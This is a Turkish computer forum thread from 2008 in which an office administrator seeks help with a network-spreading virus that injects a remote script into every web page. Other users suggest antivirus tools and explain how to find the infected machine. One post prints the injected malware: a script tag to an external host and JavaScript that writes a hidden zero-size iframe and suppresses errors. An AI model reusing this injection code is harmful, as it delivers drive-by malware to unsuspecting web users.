CaVeLL Posted October 27, 2008 Share Posted October 27, 2008 Bugün kurumumdaki bütün bilgisayarlarda aynı virüs ile güne başladım, ve canım çok sıkkın virüs, girilen bütün internet sayfalarında aynı kodu alttan alttan çağırıyor ve sistemi acayip kasıyor.. nod32 uyarı veriyor güya ama sade uyarı vermek kalıyor, sonuçta temizleyip kurtulamıyor virüsten.. Nodun Verdiği Uyarı Penceresi : Ağdan bütün heryere bulaşmış.. benim anlayamadığım, deepfreezeli 20 pc var onlarada bulaşmış.! İE de gözle belli olmuyor ama Firefoxta daha belli Sayfaların kaynak kodlarına baktığımda virüs kendini hemen gösteriyor : Sayfalardaki kod şöyle : <script language="javascript" SRC="http://t.yahoo3.info/vip.js"></script>[/CODE]Nodun tek yaptığı uyarı penceresi çıkartmak..Toplam 23 PC var ki 2 tanesinde Ticari program yüklü, formatlayıp yeniden Ticari programı yüklemek lisansalamak ve Yedekleri geri yüklemek tam bir işkence...Eğer Dos tan veya Güvenlik Kipten ve Live CD lerden temeizleyemezsem vay halime...Eğer bilgisi, tecrübesi, tavsiyesi, önereceği program veya yöntemi olan varsa Şiddetle ve Acilen bekliyorum arkadaşlar....! Link to comment Share on other sites More sharing options...
Metkan Posted October 27, 2008 Share Posted October 27, 2008 bu virüsü bende istiyorum Link to comment Share on other sites More sharing options...
Metkan Posted October 27, 2008 Share Posted October 27, 2008 ben dediğin adrese girdim ve çıktım uyarı verdi ama bulaşmadı Link to comment Share on other sites More sharing options...
asax Posted October 27, 2008 Share Posted October 27, 2008 linke girdim kopyaladım inceliyorum bakalım ne yapa bileceğiz panda yı bi dene arkadaş prg dos tan başlatarak tarama yapacak izin ver gereken uyarılarını silde ama okuyarak sil de yoksa çalışan prg lerın de çalışmaz olur istersen biraz bekle birçok virüz prgsi çalışanıda çalışmaz ediyo Link to comment Share on other sites More sharing options...
asax Posted October 27, 2008 Share Posted October 27, 2008 script in içindekiler bunlar document.writeln("<script>"); document.writeln("function oK_Begin(){"); document.writeln("var Then = new Date() "); document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)"); document.writeln("var cookieString = new String(document.cookie)"); document.writeln("var cookieHeader = \"Cookie1=\" "); document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)"); document.writeln("if (beginPosition != -1){ "); document.writeln("} else "); document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() "); document.writeln("document.write(\'<iframe width=0 height=0 src=\"Please register to see this content.);"); document.writeln("}"); document.writeln("}"); document.writeln("oK_Begin();"); document.writeln("<\/script>"); document.writeln("<script>window.onerror=function(){return true;}<\/script>") Link to comment Share on other sites More sharing options...
Macintosh Posted October 27, 2008 Share Posted October 27, 2008 Eğer bilgisi, tecrübesi, tavsiyesi, önereceği program veya yöntemi olan varsa Şiddetle ve Acilen bekliyorum arkadaşlar....! Bu trojanla daha önce uğraşmış bir arkadaşımla msn'de haberleştik. Kurtulduğu yöntemi anlattı biraz zahmetli bir yol ama işe yarıyor diyor. Bir de bu trojanın bulaştığı pc'yi temizlemek için Administrator haklarına sahip olman gerekiyormuş. Çalıştığın kurumda problem olur mu? Link to comment Share on other sites More sharing options...
CaVeLL Posted October 27, 2008 Author Share Posted October 27, 2008 Bu trojanla daha önce uğraşmış bir arkadaşımla msn'de haberleştik. Kurtulduğu yöntemi anlattı biraz zahmetli bir yol ama işe yarıyor diyor. Bir de bu trojanın bulaştığı pc'yi temizlemek için Administrator haklarına sahip olman gerekiyormuş. Çalıştığın kurumda problem olur mu? Problem Yok, bütün yetki ve haklara sahibim Ağdan bulaşıyor bu virüs, ve bütün pc ler ağda bağlı olduklarından dolayı hepsine sızmış.. Şuan Nortonu deneyeceğim, bakalım nolacak.. Hepsine Format atmayı bile göze alıyorum da şu ticari programın kurulu olduğu 2 bilgisayar canımı sıkıyor... ilgilenen cevap veren bütün arkadaşlara teşekkürler, ama tabi hala bir çözüm yok EDİT : Bu virüs tek dosya indirmiyor, Durum çubuğundan bakıyorumda birçok dosya indirmeye çalıyor.. birtaneside Office 2003 ile ilgili.. onu indirdikten sonra office setup penceresi açılıyor ve biraz kendi kendine kurulum yaptıktan sonra Office 2003 CD si istiyor... Please register to see this content. gibi adreslerede bağlanmaya çalıyor PC.. Offf be yarınki iznim bunlarla uğraşmakla geçecek, boştum normalde yarın, Allah'ım Sabır ver Link to comment Share on other sites More sharing options...
Administrator sk8er_boi Posted October 27, 2008 Administrator Share Posted October 27, 2008 combofix ile silmeyi denedin mi? Link to comment Share on other sites More sharing options...
asax Posted October 27, 2008 Share Posted October 27, 2008 Please register to see this content. programı bi denesene Link to comment Share on other sites More sharing options...
Macintosh Posted October 27, 2008 Share Posted October 27, 2008 Problem Yok, bütün yetki ve haklara sahibim @CaVeLL, kardeşim kusura bakma cevap biraz gecikti ama acil bir işim çıktı. Gitmem gerekti. Gerekli bilgileri ÖM'den attım. Bir kontrol et. Kolay gelsin. Link to comment Share on other sites More sharing options...
blow18 Posted October 27, 2008 Share Posted October 27, 2008 spyware doctor dene bi Link to comment Share on other sites More sharing options...
CaVeLL Posted October 27, 2008 Author Share Posted October 27, 2008 PC ler ile Uğraşmaktan bura ile ilgilenemedim, kendi PC me format attım.. Şuan benim bilgisayarda formattan sonra doğal olarak bir şey yok.. ama diğer bilgisayarları açmaya korkuyorum Zira ağdan yine zıplayabilir Artık benden bugünlük bu kadar kafam bir milyon oldu Norton ve Kasper ilede tarattım, Norton bişe bulamadı ama Kasper bişeler buldu. her ihtimale karşı yukardaki arkadaşların tavsiyelerini ve verdiği programlarıda yarın deneyecem. teker teker bakacam problem yoksa, hepsini ağa bağlayacam yine.. eğer ağa bağlandığım yine sorun çıkarsa ve aynen diğerlerine ağdan anında zıplarsa işte o zaman kafamı vuracak duvar seçmeye başlarım ki hiç farketmez en yakın duvara vururum ilgi alaka gösteren, cevap veren, yardımcı olmaya çalışan bütün arkadaşlara teşekkür ve memnuniyetlerimi gönderiyorum... yarın akşama bu mesajı editleyerek sonuçu yazarım.. Tekrar teşekkürler arkadaşlar, umarım verdiklerinizden yarın olumlu netice alırım.. Saygılarımla..... EDİT : Riske giremedim ve bütün PC leri formatladım, şuan sorun yok... Gitti 2 günüm Link to comment Share on other sites More sharing options...
kimim Posted October 27, 2008 Share Posted October 27, 2008 Benimde cafemde aynı virüs başıma geldi araştırdım ağa bulunan makinaların birini server olarak görüyor o makinaya format atınca düzeliyor. o makinayı bulmak için hepsi kapalı iken tek tek açıp internet explorer den herhangi adrese girmek sayfanın altında t.yahoo3.info yazısı yoksa bilgisyarı kapatıp diğerini açıp deneyerek buldum ve formatladım düzelti. Link to comment Share on other sites More sharing options...
mephex Posted October 27, 2008 Share Posted October 27, 2008 ben bi cafede rasgeldim buna sp3 silmedi ama virusu engelledi.. yani sp3 işini görür derim ben Link to comment Share on other sites More sharing options...
kayhansel Posted October 27, 2008 Share Posted October 27, 2008 Bu bir js virüsü...antiarp diye bir antivirüs var, ağdan gelen ve giden paketlerin hepsini kontrol ediyor, şu an ben bulamadım onu bulursan o seni kurtarabilir, ads.js virüsüydü galiba bununla çözmüştüm ....kolay gelsin Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.